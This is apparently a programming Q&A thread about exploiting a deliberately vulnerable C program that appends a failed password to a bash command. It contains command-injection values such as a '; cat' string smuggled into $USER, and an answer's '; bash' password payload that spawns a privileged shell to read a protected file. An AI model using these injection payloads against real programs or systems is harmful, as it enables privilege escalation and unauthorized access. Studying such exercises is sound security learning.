# Using environmental variable to execute a different file

Tags: c, linux, bash, environment-variables, code-injection

I am a little bit stuck. I have a C program which includes the environmental variable $USER. The goal is to use the environmental variable to execute a different file using command injection.

I already tried different ways of declaring USER. 
e.g.: Declaring USER as

```
env USER=">/dev/null ; cat /home/Steve/Public/file2.txt".
```

Unfortunately, that did not work.

C program:

```
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

// Execute any shell command
void execute(char *cmd)
{
   execl("/bin/bash", "bash", "-p", "-c", cmd, NULL);
}

void sanitise(char *password)
{
  int i,j;
  char tmp[15];

  // remove non-alphabet  characters from passwords
  j=0;
  for(i=0; i < 15; ++i) 
    if(password[i] >= 'a' && password[i] <= 'z') {
      tmp[j]=password[i];
      ++j;
    } else break; 
  tmp[j] = '\0';

  strcpy(password, tmp);

}


int authenticate(char *str)
{
  char stored_password[15]="";
  char pass[15];
  char path[128] = "/home/Steve/private/password";
  int i;

  FILE *fpp; 
  int auth=0;

  fpp = fopen(path, "r");

  if(fpp == NULL)
  {
     printf("Password file %s not found\n", path);
     exit(1);
  }

  fgets(stored_password, 15, fpp);
  sanitise(stored_password);

  strcpy(pass, str);
  sanitise(pass); 

  if(strcmp(stored_password,pass) == 0)
     auth=1;
  else {
     auth=0;
  }

  fclose(fpp);

  return auth; 
}

int main(int argc, char* argv[], char *envp[])
{
  char error[256] = "/home/Steve/Public/errormessage.sh $USER ";
  char pass[15];

  if(argc < 2) 
  {
    printf("Usage: %s password\n", argv[0]);
    return 0; 
  }

  // copy only 15 characters from user input, to prevent stack smashing
  strncpy(pass, argv[1], 15);
  pass[14]='\0';

  if(!authenticate(pass)) {
    // Log all failed attempts
    printf("Wrong password. This incident has been logged.\n");
    strcat(error, pass);
    execute(error); // Execute script to log events
    return 0;
  }

  // Display 'secret-file2'
  execute("cat /home/Steve/Public/file2.txt");

  return 0;
}
```

The goal would be to make the program output the file from the variable USER and not the initial file path declared in the error char. Ideally, without changing the C program at all.

Can anyone please tell me what I am missing here?

Comment: Can't tell what you're missing if you don't show all the relevant code. This just shows the declaration of `path` and that it is being passed to an `execute` function, but not what the function does.

Comment: Is your question all about standard output redirection?

Comment: @IgorS.K. It is about exploiting intentional weaknesses in a simple program by working with the linux environment. 

In this example, the goal is to execute file2.txt without entering the correct password. The buffer of the password is to short so I thought I'd use the environmental variable which is used on the error variable (which provides enough space [256] to insert code).

Comment: @MarcoBonelli Thank you. I just inserted the whole code.

Comment: @LukeMahn, I am not very sure about this, but the code is executing `/bin/bash`. If you simply replace the file `/bin/bash` with some custom script made by you having the same name, everything should be under your control because at last C program is executing your script

Comment: `password[i] >= 'a' && password[i] <= 'z'` should be replace by `islower()`.  Letters are not guaranteed to be represented consecutively.  Only numeric characters are.

Answer (score 0):

If you wish to use your C program with a fresh seted ${USER} variable "env -i" is what you should use.
Example: `env -i USER='injected code' name_of_c_program`

Comment: That's helpful. I just tried that. But I gigues there still is a problem with my injected code. 
Do you know if there is anything wrong with it? @koyaanisqatsi





env USER=">/dev/null ; cat /home/Steve/Public/file2.txt".

The idea was to make the first path output to /dev/null and then execute a second statement using ; which actually executed the file of interest.

Comment: There are differences between ' and ".

Comment: Good point. I just checked, it does not work. Neither with ' ' or " ".

Comment: You can include the output of another program/script with: `env -i USER="$(ANOTHER_PROGRAM)" YOUR_C_PROGRAM`

Answer (score 0):

If that's what the program is doing, it will execute the following command:

```
/home/Steve/Public/errormessage.sh $USER <provided-password>
```

Since you control the provided password (that is, you can pass what you want in `argv[1]` as long as it's max 14 characters), you can just execute another `bash` shell as well, and then use it to run any command you want. There really is no need to tamper with `$USER`.

```
$ ./program '; bash'
Wrong password. This incident has been logged.
$ <--- another bash shell has now started
$ cat /home/Steve/Public/file2.txt
...contents of file2.txt...
```

If you want to run it with a single command, this should work:

```
echo 'cat /home/Steve/Public/file2.txt' | ./program '; bash'
```

Comment: Thank you very much. That sound good and basically works. I tried it writing a simple bash shell script but it appears that the bash command opens a new shell which I cannot insert the "cat /home/Steve/Public/file2.txt" command into via a shell script. Do you know a way around this? Thank you so much for your input!

Comment: @LukeMahn added to the answer.

Comment: Strangely, that did not work. Is there a way to shorten the command to fit the 14 buffer of argv[1]? I tried using * for some of the directory and file names. Also, creating a variable 'command' and assigning the command to it to insert '$path' as the input for argv[1] did not work. :/l

Comment: @LukeMahn add to the question **how** you're running the program, from which folder, and also check if the folders and files exist. That should work. You do not need more than 14. The only thing that goes into `argv[1]` is `; bash`, the rest is read from standard input when `bash` starts.

Answer (score -1):

Use 'getenv' library function to get the value of environment variable(USER). And then run the command using 'system(path)'.

Comment: Thank you. Is there also a way of doing that without changing the C program but just using the environment variable?

Comment: This is not the goal of OP. OP is not writing the C program, but only running it.

Comment: @LukeMahn understood your concern. But the problem is :
    char error[256] = "/home/Steve/Public/errormessage.sh $USER "; 
Here error contains  a string which is there inside "....".
Now if you want to change the value in string 'error'. The variable needs to be assigned with the new value.

Comment: My idea was to output the result of the first path to /dev/null and then execute a second command using; which basically executes the intended file "file2.txt".

Answer (score -1):

```
#include <stdlib.h>

...
char path[256] = "/home/Steve/Public/file1.sh ";
strcat( path, getenv("USER") );

//char path[256];
//sprintf(file,"%s%s","/home/Steve/Public/file1.sh ",getenv("USER"));
...
```

Comment: Shivendra Pratap Kushwaha got ahead of me )))

Comment: This is not the goal of OP. OP is not writing the C program, but only running it. Besides, `+` cannot be used for string concatenation in C.

Comment: My first observation still stands. This does not answer the question.

Comment: @Marco - It looks like the C program is to blame. I'm guessing it is some sort of capture the flag exercise. What do you make of the C program (or what little is provided of it)?

Comment: The weakness in the C program is intentional. It's mainly about working with the environment variable to "exploit" it.